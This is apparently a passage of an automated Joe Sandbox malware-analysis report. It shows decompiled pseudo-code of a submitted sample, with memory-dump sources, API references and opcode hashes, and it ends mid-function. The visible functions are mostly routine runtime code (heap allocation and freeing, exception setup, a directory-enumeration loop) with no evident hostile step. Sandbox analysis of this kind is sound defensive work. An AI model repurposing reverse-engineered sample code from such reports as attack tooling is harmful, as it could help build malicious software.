                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                              • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040C783(void* __ecx) {
                              				intOrPtr _t59;
                              				intOrPtr* _t60;
                              				intOrPtr _t61;
                              				intOrPtr _t64;
                              				intOrPtr* _t66;
                              				intOrPtr _t68;
                              				intOrPtr* _t69;
                              				intOrPtr _t70;
                              				intOrPtr* _t72;
                              				intOrPtr _t83;
                              				signed int _t97;
                              				void* _t100;
                              				intOrPtr* _t101;
                              				intOrPtr _t102;
                              				void* _t104;
                              
                              				E00413954(E0041A330, _t104);
                              				_t100 = __ecx;
                              				_t59 =  *((intOrPtr*)(__ecx + 0x28));
                              				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
                              					 *(_t104 - 0x10) = 2;
                              				} else {
                              					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
                              				}
                              				 *((intOrPtr*)(_t104 - 0x14)) = 0;
                              				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
                              				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
                              				 *(_t104 - 4) = 0;
                              				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
                              				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
                              				if(_t61 == 0) {
                              					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
                              					_t64 =  *((intOrPtr*)(_t100 + 0xc));
                              					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
                              					 *((intOrPtr*)(_t64 + 0x10)) = 0;
                              					 *((intOrPtr*)(_t64 + 0x14)) = 0;
                              					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
                              					_t83 =  *((intOrPtr*)(_t100 + 0x14));
                              					 *((char*)(_t100 + 0x2e)) = 1;
                              					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
                              					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
                              					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
                              					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
                              						 *(_t104 - 0x10) = 2;
                              					}
                              					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
                              					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
                              					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                              					_t102 = _t68;
                              					_t69 =  *((intOrPtr*)(_t104 - 0x14));
                              					if(_t69 != 0) {
                              						 *((intOrPtr*)( *_t69 + 8))(_t69);
                              					}
                              					_t70 = _t102;
                              				} else {
                              					_t72 =  *((intOrPtr*)(_t104 - 0x14));
                              					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                              					if(_t72 != 0) {
                              						 *((intOrPtr*)( *_t72 + 8))(_t72);
                              					}
                              					_t70 =  *((intOrPtr*)(_t104 - 0x18));
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
                              				return _t70;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                              • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0040D1AB() {
                              				intOrPtr* _t44;
                              				intOrPtr _t50;
                              				void* _t61;
                              				intOrPtr* _t62;
                              				void* _t75;
                              				intOrPtr _t76;
                              				void* _t79;
                              				intOrPtr* _t80;
                              				void* _t82;
                              				void* _t84;
                              
                              				E00413954(E0041A550, _t82);
                              				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                              				_t62 =  *((intOrPtr*)(_t82 + 8));
                              				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
                              				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
                              				_t80 =  *((intOrPtr*)(_t82 + 0x14));
                              				 *(_t82 - 4) = 1;
                              				_t87 = _t80;
                              				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
                              				if(_t80 != 0) {
                              					 *((intOrPtr*)( *_t80 + 4))(_t80);
                              				}
                              				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
                              				 *(_t82 - 4) = 3;
                              				E00402155(_t82 - 0x60);
                              				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
                              				_push( *((intOrPtr*)(_t82 + 0x10)));
                              				 *(_t82 - 4) = 4;
                              				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
                              				_t88 = _t76;
                              				if(_t76 == 0) {
                              					_t77 = _t62 + 0x10;
                              					_push(_t62 + 0x10); // executed
                              					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
                              					__eflags = _t44;
                              					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
                              					if(__eflags == 0) {
                              						E0040F4D8(_t77);
                              						E0040F51A();
                              						E0040F56F(_t77);
                              						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
                              						 *(_t82 - 4) = 2;
                              						E0040D2CF(_t82 - 0x64, __eflags);
                              						__eflags = _t80;
                              						 *(_t82 - 4) = 1;
                              						if(_t80 != 0) {
                              							 *((intOrPtr*)( *_t80 + 8))(_t80);
                              						}
                              						_t50 = 0;
                              					} else {
                              						 *(_t82 - 4) = 2;
                              						E0040D2CF(_t82 - 0x64, __eflags);
                              						__eflags = _t80;
                              						 *(_t82 - 4) = 1;
                              						if(_t80 != 0) {
                              							 *((intOrPtr*)( *_t80 + 8))(_t80);
                              						}
                              						_t50 =  *((intOrPtr*)(_t82 + 0x14));
                              					}
                              				} else {
                              					 *(_t82 - 4) = 2;
                              					E0040D2CF(_t82 - 0x64, _t88);
                              					 *(_t82 - 4) = 1;
                              					if(_t80 != 0) {
                              						 *((intOrPtr*)( *_t80 + 8))(_t80);
                              					}
                              					_t50 = _t76;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
                              				return _t50;
                              			}
                              0x0040d1b0
                              0x0040d1b8
                              0x0040d1bd
                              0x0040d1c4
                              0x0040d1c8
                              0x0040d1cb
                              0x0040d1ce
                              0x0040d1d2
                              0x0040d1d4
                              0x0040d1d7
                              0x0040d1dc
                              0x0040d1dc
                              0x0040d1df
                              0x0040d1e6
                              0x0040d1ea
                              0x0040d1ef
                              0x0040d1f6
                              0x0040d1fc
                              0x0040d208
                              0x0040d20a
                              0x0040d20c
                              0x0040d22f
                              0x0040d235
                              0x0040d236
                              0x0040d23b
                              0x0040d23d
                              0x0040d240
                              0x0040d263
                              0x0040d26a
                              0x0040d271
                              0x0040d27c
                              0x0040d284
                              0x0040d288
                              0x0040d28d
                              0x0040d28f
                              0x0040d293
                              0x0040d298
                              0x0040d298
                              0x0040d29b
                              0x0040d242
                              0x0040d245
                              0x0040d249
                              0x0040d24e
                              0x0040d250
                              0x0040d254
                              0x0040d259
                              0x0040d259
                              0x0040d25c
                              0x0040d25c
                              0x0040d20e
                              0x0040d211
                              0x0040d215
                              0x0040d21c
                              0x0040d220
                              0x0040d225
                              0x0040d225
                              0x0040d228
                              0x0040d228
                              0x0040d2c3
                              0x0040d2cc

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040D1B0
                                • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                              • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00404C4A(intOrPtr* __ecx, void* __eflags) {
                              				void* _t33;
                              				intOrPtr _t43;
                              				void* _t47;
                              				intOrPtr _t53;
                              				intOrPtr* _t82;
                              				void* _t84;
                              				void* _t86;
                              				intOrPtr _t87;
                              
                              				E00413954(E004195D4, _t84);
                              				_t87 = _t86 - 0x64;
                              				_t82 = __ecx;
                              				E00404D51(_t84 - 0x70);
                              				_t53 = 0;
                              				_push(0x5c);
                              				 *((intOrPtr*)(_t84 - 4)) = 0;
                              				E00405468(_t84 - 0x1c, __ecx);
                              				_push(0x2a);
                              				 *((char*)(_t84 - 4)) = 1;
                              				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
                              				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
                              				 *((char*)(_t84 - 4)) = 3;
                              				E00403D24(_t84 - 0x34, _t33);
                              				 *((char*)(_t84 - 4)) = 5;
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
                              				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
                              					_t87 = _t87 - 0xc;
                              					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
                              					E00403D24(_t87, _t84 - 0x1c);
                              					_t47 = E00404D6C(_t84 - 0x70); // executed
                              					if(_t47 != _t53) {
                              						continue;
                              					} else {
                              						 *((char*)(_t84 - 4)) = 1;
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                              						E0040551A(_t84 - 0x38);
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                              						_t43 = 0;
                              					}
                              					L7:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
                              					return _t43;
                              				}
                              				 *((char*)(_t84 - 4)) = 1;
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                              				E0040551A(_t84 - 0x38);
                              				if(E0040489C( *_t82, 0) != 0) {
                              					_t53 = E004048AA( *_t82);
                              				}
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                              				_t43 = _t53;
                              				goto L7;
                              			}
                              0x00404c4f
                              0x00404c54
                              0x00404c59
                              0x00404c5f
                              0x00404c64
                              0x00404c66
                              0x00404c6d
                              0x00404c70
                              0x00404c75
                              0x00404c7d
                              0x00404c81
                              0x00404c86
                              0x00404c8e
                              0x00404c92
                              0x00404c9a
                              0x00404c9e
                              0x00404ca4
                              0x00404cb4
                              0x00404cbc
                              0x00404cc3
                              0x00404cca
                              0x00404cd1
                              0x00000000
                              0x00404cd3
                              0x00404cd6
                              0x00404cda
                              0x00404ce3
                              0x00404ceb
                              0x00404cf3
                              0x00404cf9
                              0x00404cfb
                              0x00404d3d
                              0x00404d42
                              0x00404d4b
                              0x00404d4b
                              0x00404d01
                              0x00404d05
                              0x00404d0e
                              0x00404d1e
                              0x00404d27
                              0x00404d27
                              0x00404d2c
                              0x00404d34
                              0x00404d3a
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404C4F
                                • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                              • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 24%
                              			E00413EA3(unsigned int _a4) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				void* _v32;
                              				intOrPtr _t19;
                              				void* _t20;
                              				signed char _t22;
                              				void* _t23;
                              				void* _t24;
                              				void* _t36;
                              				unsigned int _t44;
                              				unsigned int _t46;
                              				intOrPtr _t47;
                              				void* _t50;
                              
                              				_push(0xffffffff);
                              				_push(0x41b988);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t47;
                              				_t19 =  *0x425a38; // 0x1
                              				if(_t19 != 3) {
                              					__eflags = _t19 - 2;
                              					if(_t19 != 2) {
                              						goto L11;
                              					} else {
                              						_t24 = _a4;
                              						__eflags = _t24;
                              						if(_t24 == 0) {
                              							_t44 = 0x10;
                              						} else {
                              							_t9 = _t24 + 0xf; // 0xf
                              							_t44 = _t9 & 0xfffffff0;
                              						}
                              						_a4 = _t44;
                              						__eflags = _t44 -  *0x42283c; // 0x1e0
                              						if(__eflags > 0) {
                              							L10:
                              							_push(_t44);
                              							goto L14;
                              						} else {
                              							E0041570A(9);
                              							_pop(_t36);
                              							_v8 = 1;
                              							_v32 = E00416894(_t36, _t44 >> 4);
                              							_v8 = _v8 | 0xffffffff;
                              							E00413F69();
                              							_t23 = _v32;
                              							__eflags = _t23;
                              							if(_t23 == 0) {
                              								goto L10;
                              							}
                              						}
                              					}
                              				} else {
                              					_t46 = _a4;
                              					_t50 = _t46 -  *0x425a30; // 0x0
                              					if(_t50 > 0) {
                              						L11:
                              						_t20 = _a4;
                              						__eflags = _t20;
                              						if(_t20 == 0) {
                              							_t20 = 1;
                              						}
                              						_t22 = _t20 + 0x0000000f & 0x000000f0;
                              						__eflags = _t22;
                              						_push(_t22);
                              						L14:
                              						_push(0);
                              						_t23 = RtlAllocateHeap( *0x425a34); // executed
                              					} else {
                              						E0041570A(9);
                              						_v8 = _v8 & 0x00000000;
                              						_push(_t46);
                              						_v32 = E00415DF1();
                              						_v8 = _v8 | 0xffffffff;
                              						E00413F0A();
                              						_t23 = _v32;
                              						if(_t23 == 0) {
                              							goto L11;
                              						} else {
                              						}
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t23;
                              			}
                              0x00413ea6
                              0x00413ea8
                              0x00413ead
                              0x00413eb8
                              0x00413eb9
                              0x00413ec6
                              0x00413ece
                              0x00413f13
                              0x00413f16
                              0x00000000
                              0x00413f18
                              0x00413f18
                              0x00413f1b
                              0x00413f1d
                              0x00413f29
                              0x00413f1f
                              0x00413f1f
                              0x00413f22
                              0x00413f22
                              0x00413f2a
                              0x00413f2d
                              0x00413f33
                              0x00413f63
                              0x00413f63
                              0x00000000
                              0x00413f35
                              0x00413f37
                              0x00413f3c
                              0x00413f3d
                              0x00413f50
                              0x00413f53
                              0x00413f57
                              0x00413f5c
                              0x00413f5f
                              0x00413f61
                              0x00000000
                              0x00000000
                              0x00413f61
                              0x00413f33
                              0x00413ed0
                              0x00413ed0
                              0x00413ed3
                              0x00413ed9
                              0x00413f72
                              0x00413f72
                              0x00413f75
                              0x00413f77
                              0x00413f7b
                              0x00413f7b
                              0x00413f7f
                              0x00413f7f
                              0x00413f81
                              0x00413f82
                              0x00413f82
                              0x00413f8a
                              0x00413edf
                              0x00413ee1
                              0x00413ee7
                              0x00413eeb
                              0x00413ef2
                              0x00413ef5
                              0x00413ef9
                              0x00413efe
                              0x00413f03
                              0x00000000
                              0x00000000
                              0x00413f05
                              0x00413f03
                              0x00413ed9
                              0x00413f93
                              0x00413f9e

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$AllocateEnterHeapInitialize
                              • String ID:
                              • API String ID: 1616793339-0
                              • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                              • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 30%
                              			E00413F9F(intOrPtr _a4) {
                              				signed int _v8;
                              				char _v20;
                              				intOrPtr _v32;
                              				char _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _t19;
                              				intOrPtr _t20;
                              				intOrPtr _t24;
                              				intOrPtr _t27;
                              				intOrPtr _t40;
                              				char _t42;
                              				intOrPtr _t49;
                              
                              				_push(0xffffffff);
                              				_push(0x41b9a0);
                              				_push(E00414A2C);
                              				_t19 =  *[fs:0x0];
                              				_push(_t19);
                              				 *[fs:0x0] = _t42;
                              				_t40 = _a4;
                              				if(_t40 != 0) {
                              					_t20 =  *0x425a38; // 0x1
                              					if(_t20 != 3) {
                              						if(_t20 != 2) {
                              							_push(_t40);
                              							goto L12;
                              						} else {
                              							E0041570A(9);
                              							_v8 = 1;
                              							_t24 = E004167F8(_t40,  &_v44,  &_v36);
                              							_v40 = _t24;
                              							if(_t24 != 0) {
                              								E0041684F(_v44, _v36, _t24);
                              							}
                              							_v8 = _v8 | 0xffffffff;
                              							_t19 = E00414061();
                              							goto L9;
                              						}
                              					} else {
                              						E0041570A(9);
                              						_v8 = _v8 & 0x00000000;
                              						_t27 = E00415A9D(_t40);
                              						_v32 = _t27;
                              						if(_t27 != 0) {
                              							_push(_t40);
                              							_push(_t27);
                              							E00415AC8();
                              						}
                              						_v8 = _v8 | 0xffffffff;
                              						_t19 = E00414009();
                              						_t49 = _v32;
                              						L9:
                              						if(_t49 == 0) {
                              							_push(_a4);
                              							L12:
                              							_push(0);
                              							_t19 = RtlFreeHeap( *0x425a34); // executed
                              						}
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t19;
                              			}
                              0x00413fa2
                              0x00413fa4
                              0x00413fa9
                              0x00413fae
                              0x00413fb4
                              0x00413fb5
                              0x00413fc2
                              0x00413fc7
                              0x00413fcd
                              0x00413fd5
                              0x00414015
                              0x0041406a
                              0x00000000
                              0x00414017
                              0x00414019
                              0x0041401f
                              0x0041402f
                              0x00414037
                              0x0041403c
                              0x00414045
                              0x0041404a
                              0x0041404d
                              0x00414051
                              0x00000000
                              0x00414056
                              0x00413fd7
                              0x00413fd9
                              0x00413fdf
                              0x00413fe4
                              0x00413fea
                              0x00413fef
                              0x00413ff1
                              0x00413ff2
                              0x00413ff3
                              0x00413ff9
                              0x00413ffa
                              0x00413ffe
                              0x00414003
                              0x0041405a
                              0x0041405a
                              0x0041405c
                              0x0041406b
                              0x0041406b
                              0x00414073
                              0x00414073
                              0x0041405a
                              0x00413fd5
                              0x0041407c
                              0x00414087

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapInitialize
                              • String ID:
                              • API String ID: 641406236-0
                              • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                              • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E0040A011(signed int __ecx, void* __eflags) {
                              				void* _t28;
                              				intOrPtr* _t42;
                              				intOrPtr* _t43;
                              				void* _t49;
                              
                              				E00413954(E00419E67, _t49);
                              				_push(__ecx);
                              				_push(__ecx);
                              				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
                              				 *(_t49 - 4) = 4;
                              				E004042AD(__ecx + 0xb4);
                              				 *(_t49 - 4) = 3;
                              				E004042AD(__ecx + 0xa0);
                              				_t42 = __ecx + 0x8c;
                              				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
                              				 *_t42 = 0x41b6c0;
                              				 *(_t49 - 4) = 5;
                              				E004042D6();
                              				 *(_t49 - 4) = 2;
                              				E004042AD(_t42);
                              				_t43 = __ecx + 0x78;
                              				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
                              				 *_t43 = 0x41b6c8;
                              				 *(_t49 - 4) = 6;
                              				E004042D6();
                              				 *(_t49 - 4) = 1;
                              				E004042AD(_t43);
                              				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                              				E00407868(__ecx);
                              				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                              				asm("sbb ecx, ecx");
                              				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
                              				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
                              				return _t28;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040A016
                                • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                              • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E004092E9(void* __ecx, void* __eflags) {
                              				signed char _t22;
                              				void* _t24;
                              				void* _t45;
                              				void* _t47;
                              
                              				E00413954(E00419BF8, _t47);
                              				_t45 = __ecx;
                              				_t41 = __ecx + 0x10;
                              				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
                              				_push( *((intOrPtr*)(_t47 + 0xc)));
